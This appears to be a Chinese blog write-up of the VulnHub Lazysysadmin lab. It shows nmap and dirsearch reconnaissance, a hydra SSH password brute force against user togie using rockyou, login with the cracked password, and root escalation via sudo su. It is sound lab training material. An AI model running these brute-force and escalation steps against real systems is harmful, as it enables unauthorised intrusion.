Lazysysadmin

下载地址

https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

信息收集

主机发现

arp-scan -l

端口扫描

nmap -sS -sV -sC -O -T5  -Pn -p- 192.168.0.136

目录扫描

dirsearch -u http://192.168.0.136/

漏洞利用

首先看一下robots文件,但是disallow:

根据提示的路径逐个访问,没啥东西:

另外还发现phpmyadmin,测试一波弱口令,失败了,好像连数据库都没配置好

最后还有一个wordpress进去看一下,反复提示了一个togie用户:

逛了一圈暂时没想到可利用的漏洞,只得到了一个用户togie,只能在端口找线索

Getshell

ssh弱口令

开放了22端口,用刚刚的togie用户爆一下ssh弱口令:

hydra -l togie -P /usr/share/wordlists/rockyou.txt -t 2 -vV -e ns 192.168.0.136 ssh

得到密码12345

进行ssh连接

ssh togie@192.168.0.136
得到密码:12345

提权

whoami
id
sudo -l

发现对所有文件的权限都开放,那就简单

直接、

sudo su
whoami

提权成功啦!!!

其实这个非常简单,就是爆破弱口令,还可以试试其它的方法!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值